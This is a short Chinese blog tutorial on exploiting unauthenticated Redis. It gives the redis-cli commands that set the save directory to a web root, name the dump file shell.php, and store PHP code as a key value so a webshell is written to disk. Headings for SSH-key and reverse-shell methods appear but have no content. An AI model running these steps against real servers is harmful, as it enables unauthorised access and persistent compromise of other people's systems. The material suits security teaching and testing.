logo头像
Snippet 博客主题

Redis未授权访问

Redis未授权访问漏洞原理
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用一定的策略(如防火墙), Redis会被 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 来进行攻击操作

2.2写入webshell
前提条件:
1.靶机redis链接未授权,在攻击机上能用redis-cli连上,如上图,并未登陆验证
2.开了web服务器,并且知道路径(如利用phpinfo,或者错误爆路经),还需要具有文件读写增删改查权限

操作:
1在redis的src目录下执行命令

1
./redis -cli -h 目标ip:6379

2把shell写入web路径下,假设web路径为/home/www,首先设置redis保存的路径

1
config set dir /home/www #设置redis保存的路径

3.设置保存时的文件名。

1
config set dbfilename shell.php #设置保存时的文件名

4.写入webshell

1
2
set webshell “”\r\n\r\n<?php phpinfo();?>\r\n\r\n""
#\r\n是为了换行,因为redis在保存的时候会把许多东西和value(在这里时是双引号中的内容”)保存在一起,为了保证代码可以运行,我们加上换行符。

2.3写入一个ssh私钥进行连接
2.4写入文件(反弹shell)到计划任务目录下执行

评论系统未开启,无法评论!